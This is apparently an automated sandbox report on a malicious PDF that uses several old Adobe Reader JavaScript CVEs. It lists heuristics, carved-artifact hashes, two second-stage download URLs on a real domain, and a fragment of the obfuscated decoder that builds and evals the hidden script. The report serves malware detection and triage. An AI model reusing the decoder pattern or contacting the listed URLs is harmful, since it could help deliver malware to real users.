Risk Score: 458 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF file contains heavily obfuscated JavaScript that exploits multiple CVEs (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) to download a second-stage payload. The deobfuscated JavaScript reveals embedded URLs pointing to a suspicious domain, indicating a downloader or exploit delivery mechanism. The ML classifier also flagged this as highly malicious.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 11
- media.newPlayer — CVE-2009-4324 [critical, CVE exact, rule CVE_2009_4324]: PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after static deobfuscation)
- Collab.getIcon — CVE-2009-0927 [critical, CVE exact, rule CVE_2009_0927]: PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after static deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE exact, rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
- util.printf — CVE-2008-2992 [critical, CVE exact, rule CVE_2008_2992]: PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after static deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher [critical, CVE likely, rule PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- JavaScript action [low, 3 related findings, rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical, rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL [high, rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low, rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info, rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.simposiobolivariano.org:8080/news/sought-buildings-belong.php?jbuftjkz=33:33:2v:30:1k&hlie=30:1l:33:1f:32:1i:2w:30:32:2w&letjy=1h&fgwyufj=ovlyjvai&gdauzmoj=mtdiywc (Referenced by PDF JavaScript)
  - http://www.simposiobolivariano.org:8080/news/sought-buildings-belong.php?tqwrhfos=33:33:2v:30:1k&yuvtyrj=2v:1o:33:32:1l:31:32:1o:1j:30&askygj=1h&znt=nelp&rlstn=apxgoe (Referenced by PDF JavaScript)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (In PDF document text)
  - http://ns.adobe.com/xap/1.0/ (In PDF document text)
  - http://purl.org/dc/elements/1.1/ (In PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (In PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (In PDF document text)
  - http://www.iec.ch (Referenced by PDF JavaScript)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0019_000.js | ee04450404d9ef751ba4405bd71b3c860f8f4ac2e00d2c7ceb99d3743f9d8939 | pdf-javascript-stream | PDF /JS object 19 at offset 0x2DF | 10004 bytes |
| deobfuscated.js | 9e28fc20013096cf11b8ac2a8c5e438cbd9c51579cc45980c73a5a16f177b198 | deobfuscated-js | PDF JavaScript deobfuscation pass | 26323 bytes |
| icc_00_off000030b4.icc | 653b586c4707574ffcd648ba35494daed2c76ceafcf4c07d315ed961b1dc347f | pdf-icc-profile | PDF ICC profile at offset 0x30B4 | 408 bytes |
| icc_01_off0000334f.icc | 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e | pdf-icc-profile | PDF ICC profile at offset 0x334F | 3144 bytes |

javascript_obj0019_000.js
- Detection: ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 10 long base64-like blob(s).
- Preview script (first 1,000 lines of the extracted script):

```javascript
xx='b'; a='... (truncated)
```

deobfuscated.js
- Detection: ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 15 eval/decoder/string-building token(s). Carved artifact contains 11 long base64-like blob(s).
- Preview script (first 1,000 lines of the extracted script). Most of the preview is non-text: PDF content-stream operators, two embedded ICC profiles (Adobe "Gray Gamma 2.2" and Hewlett-Packard "sRGB IEC61966-2.1", the source of the http://www.iec.ch URL above) and their binary curve tables. Only the legible lines are reproduced here:

```javascript
/CS0 cs 1 scn 10 765.75 591.75 -729.75 re f BT 0 scn /TT0 1 Tf 12 0 0 12 16 749.25 Tm ( )Tj ET
[ICC profile data and binary curve tables omitted]
/Helv 0 Tf 0 g
test
(event.name+'').substr(0,3)=='O'+'pe'){t=event;}
p=t.target[String.fromCharCode.apply(String,[112,97,114,115,101,73,110,116])];
for(i=0;i<a.length;i+=2){
jj = 0;
s+=String.fromCharCode(p(a.substr(i,2),30+1));
}
t.target[(xx=='b')?('ev'+l):0](s);
[binary data omitted]
... (truncated)
```

In this fragment the character-code array spells "parseInt", so p is the document object's parseInt; each two-character chunk of the string a is parsed in base 31 (30+1) and appended to s, which is then passed to the document method named by 'ev'+l (l is assigned earlier in the truncated portion of the script). The base-31 encoding of a is what hides the decoded JavaScript from the string-level scan of the first artifact.